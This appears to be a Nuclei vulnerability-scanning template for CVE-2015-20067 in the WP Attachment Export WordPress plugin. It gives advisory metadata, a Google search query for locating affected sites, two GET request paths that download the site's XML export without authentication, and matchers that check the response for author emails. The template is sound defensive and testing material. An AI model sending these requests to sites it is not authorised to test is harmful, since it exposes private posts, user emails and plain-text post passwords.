48 lines
2.0 KiB
YAML
48 lines
2.0 KiB
YAML
id: CVE-2015-20067
|
|
|
|
info:
|
|
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
|
|
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
|
|
remediation: Fixed in 0.2.4
|
|
reference:
|
|
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
|
|
- https://packetstormsecurity.com/files/132693/
|
|
- https://seclists.org/fulldisclosure/2015/Jul/73
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-20067
|
|
cwe-id: CWE-862
|
|
epss-score: 0.07226
|
|
epss-percentile: 0.93884
|
|
cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: wp_attachment_export_project
|
|
product: wp_attachment_export
|
|
framework: wordpress
|
|
google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
|
|
tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
|
|
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(header, "text/xml")'
|
|
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
|
|
condition: and
|
|
# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 |